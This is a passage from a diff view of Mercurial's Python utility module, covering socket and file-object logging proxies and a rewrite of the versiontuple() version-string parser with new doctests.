572 return object.__getattribute__(self, r'_observedcall')(
572 return object.__getattribute__(self, r'_observedcall')(
573 r'write', *args, **kwargs)
573 r'write', *args, **kwargs)
574
574
575 def detach(self, *args, **kwargs):
575 def detach(self, *args, **kwargs):
576 return object.__getattribute__(self, r'_observedcall')(
576 return object.__getattribute__(self, r'_observedcall')(
577 r'detach', *args, **kwargs)
577 r'detach', *args, **kwargs)
578
578
579 def read1(self, *args, **kwargs):
579 def read1(self, *args, **kwargs):
580 return object.__getattribute__(self, r'_observedcall')(
580 return object.__getattribute__(self, r'_observedcall')(
581 r'read1', *args, **kwargs)
581 r'read1', *args, **kwargs)
582
582
583 class observedbufferedinputpipe(bufferedinputpipe):
583 class observedbufferedinputpipe(bufferedinputpipe):
584 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
584 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
585
585
586 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
586 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
587 bypass ``fileobjectproxy``. Because of this, we need to make
587 bypass ``fileobjectproxy``. Because of this, we need to make
588 ``bufferedinputpipe`` aware of these operations.
588 ``bufferedinputpipe`` aware of these operations.
589
589
590 This variation of ``bufferedinputpipe`` can notify observers about
590 This variation of ``bufferedinputpipe`` can notify observers about
591 ``os.read()`` events. It also re-publishes other events, such as
591 ``os.read()`` events. It also re-publishes other events, such as
592 ``read()`` and ``readline()``.
592 ``read()`` and ``readline()``.
593 """
593 """
594 def _fillbuffer(self):
594 def _fillbuffer(self):
595 res = super(observedbufferedinputpipe, self)._fillbuffer()
595 res = super(observedbufferedinputpipe, self)._fillbuffer()
596
596
597 fn = getattr(self._input._observer, r'osread', None)
597 fn = getattr(self._input._observer, r'osread', None)
598 if fn:
598 if fn:
599 fn(res, _chunksize)
599 fn(res, _chunksize)
600
600
601 return res
601 return res
602
602
603 # We use different observer methods because the operation isn't
603 # We use different observer methods because the operation isn't
604 # performed on the actual file object but on us.
604 # performed on the actual file object but on us.
605 def read(self, size):
605 def read(self, size):
606 res = super(observedbufferedinputpipe, self).read(size)
606 res = super(observedbufferedinputpipe, self).read(size)
607
607
608 fn = getattr(self._input._observer, r'bufferedread', None)
608 fn = getattr(self._input._observer, r'bufferedread', None)
609 if fn:
609 if fn:
610 fn(res, size)
610 fn(res, size)
611
611
612 return res
612 return res
613
613
614 def readline(self, *args, **kwargs):
614 def readline(self, *args, **kwargs):
615 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
615 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
616
616
617 fn = getattr(self._input._observer, r'bufferedreadline', None)
617 fn = getattr(self._input._observer, r'bufferedreadline', None)
618 if fn:
618 if fn:
619 fn(res)
619 fn(res)
620
620
621 return res
621 return res
622
622
623 PROXIED_SOCKET_METHODS = {
623 PROXIED_SOCKET_METHODS = {
624 r'makefile',
624 r'makefile',
625 r'recv',
625 r'recv',
626 r'recvfrom',
626 r'recvfrom',
627 r'recvfrom_into',
627 r'recvfrom_into',
628 r'recv_into',
628 r'recv_into',
629 r'send',
629 r'send',
630 r'sendall',
630 r'sendall',
631 r'sendto',
631 r'sendto',
632 r'setblocking',
632 r'setblocking',
633 r'settimeout',
633 r'settimeout',
634 r'gettimeout',
634 r'gettimeout',
635 r'setsockopt',
635 r'setsockopt',
636 }
636 }
637
637
638 class socketproxy(object):
638 class socketproxy(object):
639 """A proxy around a socket that tells a watcher when events occur.
639 """A proxy around a socket that tells a watcher when events occur.
640
640
641 This is like ``fileobjectproxy`` except for sockets.
641 This is like ``fileobjectproxy`` except for sockets.
642
642
643 This type is intended to only be used for testing purposes. Think hard
643 This type is intended to only be used for testing purposes. Think hard
644 before using it in important code.
644 before using it in important code.
645 """
645 """
646 __slots__ = (
646 __slots__ = (
647 r'_orig',
647 r'_orig',
648 r'_observer',
648 r'_observer',
649 )
649 )
650
650
651 def __init__(self, sock, observer):
651 def __init__(self, sock, observer):
652 object.__setattr__(self, r'_orig', sock)
652 object.__setattr__(self, r'_orig', sock)
653 object.__setattr__(self, r'_observer', observer)
653 object.__setattr__(self, r'_observer', observer)
654
654
655 def __getattribute__(self, name):
655 def __getattribute__(self, name):
656 if name in PROXIED_SOCKET_METHODS:
656 if name in PROXIED_SOCKET_METHODS:
657 return object.__getattribute__(self, name)
657 return object.__getattribute__(self, name)
658
658
659 return getattr(object.__getattribute__(self, r'_orig'), name)
659 return getattr(object.__getattribute__(self, r'_orig'), name)
660
660
661 def __delattr__(self, name):
661 def __delattr__(self, name):
662 return delattr(object.__getattribute__(self, r'_orig'), name)
662 return delattr(object.__getattribute__(self, r'_orig'), name)
663
663
664 def __setattr__(self, name, value):
664 def __setattr__(self, name, value):
665 return setattr(object.__getattribute__(self, r'_orig'), name, value)
665 return setattr(object.__getattribute__(self, r'_orig'), name, value)
666
666
667 def __nonzero__(self):
667 def __nonzero__(self):
668 return bool(object.__getattribute__(self, r'_orig'))
668 return bool(object.__getattribute__(self, r'_orig'))
669
669
670 __bool__ = __nonzero__
670 __bool__ = __nonzero__
671
671
672 def _observedcall(self, name, *args, **kwargs):
672 def _observedcall(self, name, *args, **kwargs):
673 # Call the original object.
673 # Call the original object.
674 orig = object.__getattribute__(self, r'_orig')
674 orig = object.__getattribute__(self, r'_orig')
675 res = getattr(orig, name)(*args, **kwargs)
675 res = getattr(orig, name)(*args, **kwargs)
676
676
677 # Call a method on the observer of the same name with arguments
677 # Call a method on the observer of the same name with arguments
678 # so it can react, log, etc.
678 # so it can react, log, etc.
679 observer = object.__getattribute__(self, r'_observer')
679 observer = object.__getattribute__(self, r'_observer')
680 fn = getattr(observer, name, None)
680 fn = getattr(observer, name, None)
681 if fn:
681 if fn:
682 fn(res, *args, **kwargs)
682 fn(res, *args, **kwargs)
683
683
684 return res
684 return res
685
685
686 def makefile(self, *args, **kwargs):
686 def makefile(self, *args, **kwargs):
687 res = object.__getattribute__(self, r'_observedcall')(
687 res = object.__getattribute__(self, r'_observedcall')(
688 r'makefile', *args, **kwargs)
688 r'makefile', *args, **kwargs)
689
689
690 # The file object may be used for I/O. So we turn it into a
690 # The file object may be used for I/O. So we turn it into a
691 # proxy using our observer.
691 # proxy using our observer.
692 observer = object.__getattribute__(self, r'_observer')
692 observer = object.__getattribute__(self, r'_observer')
693 return makeloggingfileobject(observer.fh, res, observer.name,
693 return makeloggingfileobject(observer.fh, res, observer.name,
694 reads=observer.reads,
694 reads=observer.reads,
695 writes=observer.writes,
695 writes=observer.writes,
696 logdata=observer.logdata,
696 logdata=observer.logdata,
697 logdataapis=observer.logdataapis)
697 logdataapis=observer.logdataapis)
698
698
699 def recv(self, *args, **kwargs):
699 def recv(self, *args, **kwargs):
700 return object.__getattribute__(self, r'_observedcall')(
700 return object.__getattribute__(self, r'_observedcall')(
701 r'recv', *args, **kwargs)
701 r'recv', *args, **kwargs)
702
702
703 def recvfrom(self, *args, **kwargs):
703 def recvfrom(self, *args, **kwargs):
704 return object.__getattribute__(self, r'_observedcall')(
704 return object.__getattribute__(self, r'_observedcall')(
705 r'recvfrom', *args, **kwargs)
705 r'recvfrom', *args, **kwargs)
706
706
707 def recvfrom_into(self, *args, **kwargs):
707 def recvfrom_into(self, *args, **kwargs):
708 return object.__getattribute__(self, r'_observedcall')(
708 return object.__getattribute__(self, r'_observedcall')(
709 r'recvfrom_into', *args, **kwargs)
709 r'recvfrom_into', *args, **kwargs)
710
710
711 def recv_into(self, *args, **kwargs):
711 def recv_into(self, *args, **kwargs):
712 return object.__getattribute__(self, r'_observedcall')(
712 return object.__getattribute__(self, r'_observedcall')(
713 r'recv_info', *args, **kwargs)
713 r'recv_info', *args, **kwargs)
714
714
715 def send(self, *args, **kwargs):
715 def send(self, *args, **kwargs):
716 return object.__getattribute__(self, r'_observedcall')(
716 return object.__getattribute__(self, r'_observedcall')(
717 r'send', *args, **kwargs)
717 r'send', *args, **kwargs)
718
718
719 def sendall(self, *args, **kwargs):
719 def sendall(self, *args, **kwargs):
720 return object.__getattribute__(self, r'_observedcall')(
720 return object.__getattribute__(self, r'_observedcall')(
721 r'sendall', *args, **kwargs)
721 r'sendall', *args, **kwargs)
722
722
723 def sendto(self, *args, **kwargs):
723 def sendto(self, *args, **kwargs):
724 return object.__getattribute__(self, r'_observedcall')(
724 return object.__getattribute__(self, r'_observedcall')(
725 r'sendto', *args, **kwargs)
725 r'sendto', *args, **kwargs)
726
726
727 def setblocking(self, *args, **kwargs):
727 def setblocking(self, *args, **kwargs):
728 return object.__getattribute__(self, r'_observedcall')(
728 return object.__getattribute__(self, r'_observedcall')(
729 r'setblocking', *args, **kwargs)
729 r'setblocking', *args, **kwargs)
730
730
731 def settimeout(self, *args, **kwargs):
731 def settimeout(self, *args, **kwargs):
732 return object.__getattribute__(self, r'_observedcall')(
732 return object.__getattribute__(self, r'_observedcall')(
733 r'settimeout', *args, **kwargs)
733 r'settimeout', *args, **kwargs)
734
734
735 def gettimeout(self, *args, **kwargs):
735 def gettimeout(self, *args, **kwargs):
736 return object.__getattribute__(self, r'_observedcall')(
736 return object.__getattribute__(self, r'_observedcall')(
737 r'gettimeout', *args, **kwargs)
737 r'gettimeout', *args, **kwargs)
738
738
739 def setsockopt(self, *args, **kwargs):
739 def setsockopt(self, *args, **kwargs):
740 return object.__getattribute__(self, r'_observedcall')(
740 return object.__getattribute__(self, r'_observedcall')(
741 r'setsockopt', *args, **kwargs)
741 r'setsockopt', *args, **kwargs)
742
742
743 class baseproxyobserver(object):
743 class baseproxyobserver(object):
744 def _writedata(self, data):
744 def _writedata(self, data):
745 if not self.logdata:
745 if not self.logdata:
746 if self.logdataapis:
746 if self.logdataapis:
747 self.fh.write('\n')
747 self.fh.write('\n')
748 self.fh.flush()
748 self.fh.flush()
749 return
749 return
750
750
751 # Simple case writes all data on a single line.
751 # Simple case writes all data on a single line.
752 if b'\n' not in data:
752 if b'\n' not in data:
753 if self.logdataapis:
753 if self.logdataapis:
754 self.fh.write(': %s\n' % stringutil.escapestr(data))
754 self.fh.write(': %s\n' % stringutil.escapestr(data))
755 else:
755 else:
756 self.fh.write('%s> %s\n'
756 self.fh.write('%s> %s\n'
757 % (self.name, stringutil.escapestr(data)))
757 % (self.name, stringutil.escapestr(data)))
758 self.fh.flush()
758 self.fh.flush()
759 return
759 return
760
760
761 # Data with newlines is written to multiple lines.
761 # Data with newlines is written to multiple lines.
762 if self.logdataapis:
762 if self.logdataapis:
763 self.fh.write(':\n')
763 self.fh.write(':\n')
764
764
765 lines = data.splitlines(True)
765 lines = data.splitlines(True)
766 for line in lines:
766 for line in lines:
767 self.fh.write('%s> %s\n'
767 self.fh.write('%s> %s\n'
768 % (self.name, stringutil.escapestr(line)))
768 % (self.name, stringutil.escapestr(line)))
769 self.fh.flush()
769 self.fh.flush()
770
770
771 class fileobjectobserver(baseproxyobserver):
771 class fileobjectobserver(baseproxyobserver):
772 """Logs file object activity."""
772 """Logs file object activity."""
773 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
773 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
774 logdataapis=True):
774 logdataapis=True):
775 self.fh = fh
775 self.fh = fh
776 self.name = name
776 self.name = name
777 self.logdata = logdata
777 self.logdata = logdata
778 self.logdataapis = logdataapis
778 self.logdataapis = logdataapis
779 self.reads = reads
779 self.reads = reads
780 self.writes = writes
780 self.writes = writes
781
781
782 def read(self, res, size=-1):
782 def read(self, res, size=-1):
783 if not self.reads:
783 if not self.reads:
784 return
784 return
785 # Python 3 can return None from reads at EOF instead of empty strings.
785 # Python 3 can return None from reads at EOF instead of empty strings.
786 if res is None:
786 if res is None:
787 res = ''
787 res = ''
788
788
789 if self.logdataapis:
789 if self.logdataapis:
790 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
790 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
791
791
792 self._writedata(res)
792 self._writedata(res)
793
793
794 def readline(self, res, limit=-1):
794 def readline(self, res, limit=-1):
795 if not self.reads:
795 if not self.reads:
796 return
796 return
797
797
798 if self.logdataapis:
798 if self.logdataapis:
799 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
799 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
800
800
801 self._writedata(res)
801 self._writedata(res)
802
802
803 def readinto(self, res, dest):
803 def readinto(self, res, dest):
804 if not self.reads:
804 if not self.reads:
805 return
805 return
806
806
807 if self.logdataapis:
807 if self.logdataapis:
808 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
808 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
809 res))
809 res))
810
810
811 data = dest[0:res] if res is not None else b''
811 data = dest[0:res] if res is not None else b''
812 self._writedata(data)
812 self._writedata(data)
813
813
814 def write(self, res, data):
814 def write(self, res, data):
815 if not self.writes:
815 if not self.writes:
816 return
816 return
817
817
818 # Python 2 returns None from some write() calls. Python 3 (reasonably)
818 # Python 2 returns None from some write() calls. Python 3 (reasonably)
819 # returns the integer bytes written.
819 # returns the integer bytes written.
820 if res is None and data:
820 if res is None and data:
821 res = len(data)
821 res = len(data)
822
822
823 if self.logdataapis:
823 if self.logdataapis:
824 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
824 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
825
825
826 self._writedata(data)
826 self._writedata(data)
827
827
828 def flush(self, res):
828 def flush(self, res):
829 if not self.writes:
829 if not self.writes:
830 return
830 return
831
831
832 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
832 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
833
833
834 # For observedbufferedinputpipe.
834 # For observedbufferedinputpipe.
835 def bufferedread(self, res, size):
835 def bufferedread(self, res, size):
836 if not self.reads:
836 if not self.reads:
837 return
837 return
838
838
839 if self.logdataapis:
839 if self.logdataapis:
840 self.fh.write('%s> bufferedread(%d) -> %d' % (
840 self.fh.write('%s> bufferedread(%d) -> %d' % (
841 self.name, size, len(res)))
841 self.name, size, len(res)))
842
842
843 self._writedata(res)
843 self._writedata(res)
844
844
845 def bufferedreadline(self, res):
845 def bufferedreadline(self, res):
846 if not self.reads:
846 if not self.reads:
847 return
847 return
848
848
849 if self.logdataapis:
849 if self.logdataapis:
850 self.fh.write('%s> bufferedreadline() -> %d' % (
850 self.fh.write('%s> bufferedreadline() -> %d' % (
851 self.name, len(res)))
851 self.name, len(res)))
852
852
853 self._writedata(res)
853 self._writedata(res)
854
854
855 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
855 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
856 logdata=False, logdataapis=True):
856 logdata=False, logdataapis=True):
857 """Turn a file object into a logging file object."""
857 """Turn a file object into a logging file object."""
858
858
859 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
859 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
860 logdata=logdata, logdataapis=logdataapis)
860 logdata=logdata, logdataapis=logdataapis)
861 return fileobjectproxy(fh, observer)
861 return fileobjectproxy(fh, observer)
862
862
863 class socketobserver(baseproxyobserver):
863 class socketobserver(baseproxyobserver):
864 """Logs socket activity."""
864 """Logs socket activity."""
865 def __init__(self, fh, name, reads=True, writes=True, states=True,
865 def __init__(self, fh, name, reads=True, writes=True, states=True,
866 logdata=False, logdataapis=True):
866 logdata=False, logdataapis=True):
867 self.fh = fh
867 self.fh = fh
868 self.name = name
868 self.name = name
869 self.reads = reads
869 self.reads = reads
870 self.writes = writes
870 self.writes = writes
871 self.states = states
871 self.states = states
872 self.logdata = logdata
872 self.logdata = logdata
873 self.logdataapis = logdataapis
873 self.logdataapis = logdataapis
874
874
875 def makefile(self, res, mode=None, bufsize=None):
875 def makefile(self, res, mode=None, bufsize=None):
876 if not self.states:
876 if not self.states:
877 return
877 return
878
878
879 self.fh.write('%s> makefile(%r, %r)\n' % (
879 self.fh.write('%s> makefile(%r, %r)\n' % (
880 self.name, mode, bufsize))
880 self.name, mode, bufsize))
881
881
882 def recv(self, res, size, flags=0):
882 def recv(self, res, size, flags=0):
883 if not self.reads:
883 if not self.reads:
884 return
884 return
885
885
886 if self.logdataapis:
886 if self.logdataapis:
887 self.fh.write('%s> recv(%d, %d) -> %d' % (
887 self.fh.write('%s> recv(%d, %d) -> %d' % (
888 self.name, size, flags, len(res)))
888 self.name, size, flags, len(res)))
889 self._writedata(res)
889 self._writedata(res)
890
890
891 def recvfrom(self, res, size, flags=0):
891 def recvfrom(self, res, size, flags=0):
892 if not self.reads:
892 if not self.reads:
893 return
893 return
894
894
895 if self.logdataapis:
895 if self.logdataapis:
896 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
896 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
897 self.name, size, flags, len(res[0])))
897 self.name, size, flags, len(res[0])))
898
898
899 self._writedata(res[0])
899 self._writedata(res[0])
900
900
901 def recvfrom_into(self, res, buf, size, flags=0):
901 def recvfrom_into(self, res, buf, size, flags=0):
902 if not self.reads:
902 if not self.reads:
903 return
903 return
904
904
905 if self.logdataapis:
905 if self.logdataapis:
906 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
906 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
907 self.name, size, flags, res[0]))
907 self.name, size, flags, res[0]))
908
908
909 self._writedata(buf[0:res[0]])
909 self._writedata(buf[0:res[0]])
910
910
911 def recv_into(self, res, buf, size=0, flags=0):
911 def recv_into(self, res, buf, size=0, flags=0):
912 if not self.reads:
912 if not self.reads:
913 return
913 return
914
914
915 if self.logdataapis:
915 if self.logdataapis:
916 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
916 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
917 self.name, size, flags, res))
917 self.name, size, flags, res))
918
918
919 self._writedata(buf[0:res])
919 self._writedata(buf[0:res])
920
920
921 def send(self, res, data, flags=0):
921 def send(self, res, data, flags=0):
922 if not self.writes:
922 if not self.writes:
923 return
923 return
924
924
925 self.fh.write('%s> send(%d, %d) -> %d' % (
925 self.fh.write('%s> send(%d, %d) -> %d' % (
926 self.name, len(data), flags, len(res)))
926 self.name, len(data), flags, len(res)))
927 self._writedata(data)
927 self._writedata(data)
928
928
929 def sendall(self, res, data, flags=0):
929 def sendall(self, res, data, flags=0):
930 if not self.writes:
930 if not self.writes:
931 return
931 return
932
932
933 if self.logdataapis:
933 if self.logdataapis:
934 # Returns None on success. So don't bother reporting return value.
934 # Returns None on success. So don't bother reporting return value.
935 self.fh.write('%s> sendall(%d, %d)' % (
935 self.fh.write('%s> sendall(%d, %d)' % (
936 self.name, len(data), flags))
936 self.name, len(data), flags))
937
937
938 self._writedata(data)
938 self._writedata(data)
939
939
940 def sendto(self, res, data, flagsoraddress, address=None):
940 def sendto(self, res, data, flagsoraddress, address=None):
941 if not self.writes:
941 if not self.writes:
942 return
942 return
943
943
944 if address:
944 if address:
945 flags = flagsoraddress
945 flags = flagsoraddress
946 else:
946 else:
947 flags = 0
947 flags = 0
948
948
949 if self.logdataapis:
949 if self.logdataapis:
950 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
950 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
951 self.name, len(data), flags, address, res))
951 self.name, len(data), flags, address, res))
952
952
953 self._writedata(data)
953 self._writedata(data)
954
954
955 def setblocking(self, res, flag):
955 def setblocking(self, res, flag):
956 if not self.states:
956 if not self.states:
957 return
957 return
958
958
959 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
959 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
960
960
961 def settimeout(self, res, value):
961 def settimeout(self, res, value):
962 if not self.states:
962 if not self.states:
963 return
963 return
964
964
965 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
965 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
966
966
967 def gettimeout(self, res):
967 def gettimeout(self, res):
968 if not self.states:
968 if not self.states:
969 return
969 return
970
970
971 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
971 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
972
972
973 def setsockopt(self, level, optname, value):
973 def setsockopt(self, level, optname, value):
974 if not self.states:
974 if not self.states:
975 return
975 return
976
976
977 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
977 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
978 self.name, level, optname, value))
978 self.name, level, optname, value))
979
979
980 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
980 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
981 logdata=False, logdataapis=True):
981 logdata=False, logdataapis=True):
982 """Turn a socket into a logging socket."""
982 """Turn a socket into a logging socket."""
983
983
984 observer = socketobserver(logh, name, reads=reads, writes=writes,
984 observer = socketobserver(logh, name, reads=reads, writes=writes,
985 states=states, logdata=logdata,
985 states=states, logdata=logdata,
986 logdataapis=logdataapis)
986 logdataapis=logdataapis)
987 return socketproxy(fh, observer)
987 return socketproxy(fh, observer)
988
988
989 def version():
989 def version():
990 """Return version information if available."""
990 """Return version information if available."""
991 try:
991 try:
992 from . import __version__
992 from . import __version__
993 return __version__.version
993 return __version__.version
994 except ImportError:
994 except ImportError:
995 return 'unknown'
995 return 'unknown'
996
996
997 def versiontuple(v=None, n=4):
997 def versiontuple(v=None, n=4):
998 """Parses a Mercurial version string into an N-tuple.
998 """Parses a Mercurial version string into an N-tuple.
999
999
1000 The version string to be parsed is specified with the ``v`` argument.
1000 The version string to be parsed is specified with the ``v`` argument.
1001 If it isn't defined, the current Mercurial version string will be parsed.
1001 If it isn't defined, the current Mercurial version string will be parsed.
1002
1002
1003 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1003 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1004 returned values:
1004 returned values:
1005
1005
1006 >>> v = b'3.6.1+190-df9b73d2d444'
1006 >>> v = b'3.6.1+190-df9b73d2d444'
1007 >>> versiontuple(v, 2)
1007 >>> versiontuple(v, 2)
1008 (3, 6)
1008 (3, 6)
1009 >>> versiontuple(v, 3)
1009 >>> versiontuple(v, 3)
1010 (3, 6, 1)
1010 (3, 6, 1)
1011 >>> versiontuple(v, 4)
1011 >>> versiontuple(v, 4)
1012 (3, 6, 1, '190-df9b73d2d444')
1012 (3, 6, 1, '190-df9b73d2d444')
1013
1013
1014 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1014 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1015 (3, 6, 1, '190-df9b73d2d444+20151118')
1015 (3, 6, 1, '190-df9b73d2d444+20151118')
1016
1016
1017 >>> v = b'3.6'
1017 >>> v = b'3.6'
1018 >>> versiontuple(v, 2)
1018 >>> versiontuple(v, 2)
1019 (3, 6)
1019 (3, 6)
1020 >>> versiontuple(v, 3)
1020 >>> versiontuple(v, 3)
1021 (3, 6, None)
1021 (3, 6, None)
1022 >>> versiontuple(v, 4)
1022 >>> versiontuple(v, 4)
1023 (3, 6, None, None)
1023 (3, 6, None, None)
1024
1024
1025 >>> v = b'3.9-rc'
1025 >>> v = b'3.9-rc'
1026 >>> versiontuple(v, 2)
1026 >>> versiontuple(v, 2)
1027 (3, 9)
1027 (3, 9)
1028 >>> versiontuple(v, 3)
1028 >>> versiontuple(v, 3)
1029 (3, 9, None)
1029 (3, 9, None)
1030 >>> versiontuple(v, 4)
1030 >>> versiontuple(v, 4)
1031 (3, 9, None, 'rc')
1031 (3, 9, None, 'rc')
1032
1032
1033 >>> v = b'3.9-rc+2-02a8fea4289b'
1033 >>> v = b'3.9-rc+2-02a8fea4289b'
1034 >>> versiontuple(v, 2)
1034 >>> versiontuple(v, 2)
1035 (3, 9)
1035 (3, 9)
1036 >>> versiontuple(v, 3)
1036 >>> versiontuple(v, 3)
1037 (3, 9, None)
1037 (3, 9, None)
1038 >>> versiontuple(v, 4)
1038 >>> versiontuple(v, 4)
1039 (3, 9, None, 'rc+2-02a8fea4289b')
1039 (3, 9, None, 'rc+2-02a8fea4289b')
1040
1041 >>> versiontuple(b'4.6rc0')
1042 (4, 6, None, 'rc0')
1043 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1044 (4, 6, None, 'rc0+12-425d55e54f98')
1045 >>> versiontuple(b'.1.2.3')
1046 (None, None, None, '.1.2.3')
1047 >>> versiontuple(b'12.34..5')
1048 (12, 34, None, '..5')
1049 >>> versiontuple(b'1.2.3.4.5.6')
1050 (1, 2, 3, '.4.5.6')
1040 """
1051 """
1041 if not v:
1052 if not v:
1042 v = version()
1053 v = version()
1043 parts = remod.split('[\+-]', v, 1)
1054 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1044 if len(parts) == 1:
1055 if not m:
1045 vparts, extra = parts[0], None
1056 vparts, extra = '', v
1057 elif m.group(2):
1058 vparts, extra = m.groups()
1046 else:
1059 else:
1047 vparts, extra = parts
1060 vparts, extra = m.group(1), None
1048
1061
1049 vints = []
1062 vints = []
1050 for i in vparts.split('.'):
1063 for i in vparts.split('.'):
1051 try:
1064 try:
1052 vints.append(int(i))
1065 vints.append(int(i))
1053 except ValueError:
1066 except ValueError:
1054 break
1067 break
1055 # (3, 6) -> (3, 6, None)
1068 # (3, 6) -> (3, 6, None)
1056 while len(vints) < 3:
1069 while len(vints) < 3:
1057 vints.append(None)
1070 vints.append(None)
1058
1071
1059 if n == 2:
1072 if n == 2:
1060 return (vints[0], vints[1])
1073 return (vints[0], vints[1])
1061 if n == 3:
1074 if n == 3:
1062 return (vints[0], vints[1], vints[2])
1075 return (vints[0], vints[1], vints[2])
1063 if n == 4:
1076 if n == 4:
1064 return (vints[0], vints[1], vints[2], extra)
1077 return (vints[0], vints[1], vints[2], extra)
1065
1078
1066 def cachefunc(func):
1079 def cachefunc(func):
1067 '''cache the result of function calls'''
1080 '''cache the result of function calls'''
1068 # XXX doesn't handle keywords args
1081 # XXX doesn't handle keywords args
1069 if func.__code__.co_argcount == 0:
1082 if func.__code__.co_argcount == 0:
1070 cache = []
1083 cache = []
1071 def f():
1084 def f():
1072 if len(cache) == 0:
1085 if len(cache) == 0:
1073 cache.append(func())
1086 cache.append(func())
1074 return cache[0]
1087 return cache[0]
1075 return f
1088 return f
1076 cache = {}
1089 cache = {}
1077 if func.__code__.co_argcount == 1:
1090 if func.__code__.co_argcount == 1:
1078 # we gain a small amount of time because
1091 # we gain a small amount of time because
1079 # we don't need to pack/unpack the list
1092 # we don't need to pack/unpack the list
1080 def f(arg):
1093 def f(arg):
1081 if arg not in cache:
1094 if arg not in cache:
1082 cache[arg] = func(arg)
1095 cache[arg] = func(arg)
1083 return cache[arg]
1096 return cache[arg]
1084 else:
1097 else:
1085 def f(*args):
1098 def f(*args):
1086 if args not in cache:
1099 if args not in cache:
1087 cache[args] = func(*args)
1100 cache[args] = func(*args)
1088 return cache[args]
1101 return cache[args]
1089
1102
1090 return f
1103 return f
1091
1104
1092 class cow(object):
1105 class cow(object):
1093 """helper class to make copy-on-write easier
1106 """helper class to make copy-on-write easier
1094
1107
1095 Call preparewrite before doing any writes.
1108 Call preparewrite before doing any writes.
1096 """
1109 """
1097
1110
1098 def preparewrite(self):
1111 def preparewrite(self):
1099 """call this before writes, return self or a copied new object"""
1112 """call this before writes, return self or a copied new object"""
1100 if getattr(self, '_copied', 0):
1113 if getattr(self, '_copied', 0):
1101 self._copied -= 1
1114 self._copied -= 1
1102 return self.__class__(self)
1115 return self.__class__(self)
1103 return self
1116 return self
1104
1117
1105 def copy(self):
1118 def copy(self):
1106 """always do a cheap copy"""
1119 """always do a cheap copy"""
1107 self._copied = getattr(self, '_copied', 0) + 1
1120 self._copied = getattr(self, '_copied', 0) + 1
1108 return self
1121 return self
1109
1122
1110 class sortdict(collections.OrderedDict):
1123 class sortdict(collections.OrderedDict):
1111 '''a simple sorted dictionary
1124 '''a simple sorted dictionary
1112
1125
1113 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1126 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1114 >>> d2 = d1.copy()
1127 >>> d2 = d1.copy()
1115 >>> d2
1128 >>> d2
1116 sortdict([('a', 0), ('b', 1)])
1129 sortdict([('a', 0), ('b', 1)])
1117 >>> d2.update([(b'a', 2)])
1130 >>> d2.update([(b'a', 2)])
1118 >>> list(d2.keys()) # should still be in last-set order
1131 >>> list(d2.keys()) # should still be in last-set order
1119 ['b', 'a']
1132 ['b', 'a']
1120 '''
1133 '''
1121
1134
1122 def __setitem__(self, key, value):
1135 def __setitem__(self, key, value):
1123 if key in self:
1136 if key in self:
1124 del self[key]
1137 del self[key]
1125 super(sortdict, self).__setitem__(key, value)
1138 super(sortdict, self).__setitem__(key, value)
1126
1139
1127 if pycompat.ispypy:
1140 if pycompat.ispypy:
1128 # __setitem__() isn't called as of PyPy 5.8.0
1141 # __setitem__() isn't called as of PyPy 5.8.0
1129 def update(self, src):
1142 def update(self, src):
1130 if isinstance(src, dict):
1143 if isinstance(src, dict):
1131 src = src.iteritems()
1144 src = src.iteritems()
1132 for k, v in src:
1145 for k, v in src:
1133 self[k] = v
1146 self[k] = v
1134
1147
1135 class cowdict(cow, dict):
1148 class cowdict(cow, dict):
1136 """copy-on-write dict
1149 """copy-on-write dict
1137
1150
1138 Be sure to call d = d.preparewrite() before writing to d.
1151 Be sure to call d = d.preparewrite() before writing to d.
1139
1152
1140 >>> a = cowdict()
1153 >>> a = cowdict()
1141 >>> a is a.preparewrite()
1154 >>> a is a.preparewrite()
1142 True
1155 True
1143 >>> b = a.copy()
1156 >>> b = a.copy()
1144 >>> b is a
1157 >>> b is a
1145 True
1158 True
1146 >>> c = b.copy()
1159 >>> c = b.copy()
